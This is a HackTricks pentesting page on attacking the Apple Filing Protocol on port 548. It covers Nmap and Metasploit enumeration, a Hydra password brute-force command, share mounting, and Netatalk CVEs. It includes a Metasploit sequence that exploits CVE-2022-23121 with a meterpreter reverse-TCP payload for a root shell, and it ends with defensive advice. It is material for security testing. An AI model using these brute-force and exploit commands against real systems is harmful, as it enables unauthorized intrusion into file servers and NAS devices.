548 - Pentesting Apple Filing Protocol (AFP)

Reading time: 5 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

The Apple Filing Protocol (AFP), once known as AppleTalk Filing Protocol, is a specialized network protocol included within Apple File Service (AFS). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

  • Legacy macOS / Mac OS 9 environments
  • NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source Netatalk daemon
  • Mixed-OS networks where Time-Machine-over-AFP is still enabled

Default TCP Port: 548 (AFP over TCP / DSI)

bash
PORT     STATE SERVICE
548/tcp  open  afp

Enumeration

Quick banner / server info

bash
# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>

Useful AFP NSE scripts:

ScriptWhat it does
afp-lsList available AFP volumes and files
afp-brutePassword brute-force against AFP login
afp-serverinfoDump server name, machine type, AFP version, supported UAMs, etc.
afp-showmountList shares together with their ACLs
afp-path-vulnDetects (and can exploit) directory-traversal, CVE-2010-0533

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

bash
hydra -L users.txt -P passwords.txt afp://<IP>

Interacting with shares

macOS

bash
# Finder β†’ Go β†’ "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp

Linux (using afpfs-ng ‑ packaged in most distros)

bash
apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>

Once mounted, remember that classic Mac resource-forks are stored as hidden ._* AppleDouble files – these often hold interesting metadata that DFIR tools miss.


Common Vulnerabilities & Exploitation

Netatalk unauthenticated RCE chain (2022)

Several NAS vendors shipped Netatalk ≀3.1.12. A lack of bounds checking in parse_entries() allows an attacker to craft a malicious AppleDouble header and obtain remote root before authentication (CVSS 9.8 – CVE-2022-23121). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.

Metasploit (>= 6.3) ships the module exploit/linux/netatalk/parse_entries which delivers the payload via DSI WRITE.

bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as root.

Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the DSI OpenSession handler allowing unauthenticated code execution (CVE-2018-1160). A detailed analysis and PoC were published by Tenable Research.

Other notable issues

  • CVE-2022-22995 – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
  • CVE-2010-0533 – Directory traversal in Apple Mac OS X 10.6 AFP (detected by afp-path-vuln.nse).
  • Multiple memory-safety bugs were fixed in Netatalk 4.x (2024) – recommend upgrading rather than patching individual CVEs.

Defensive Recommendations

  1. Disable AFP unless strictly required – use SMB3 or NFS instead.
  2. If AFP must stay, upgrade Netatalk to β‰₯ 3.1.18 or 4.x, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
  3. Enforce Strong UAMs (e.g. DHX2), disable clear-text and guest logins.
  4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
  5. Periodically scan with nmap -p 548 --script afp-* in CI/CD to catch rogue / downgraded appliances.

Brute-Force

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks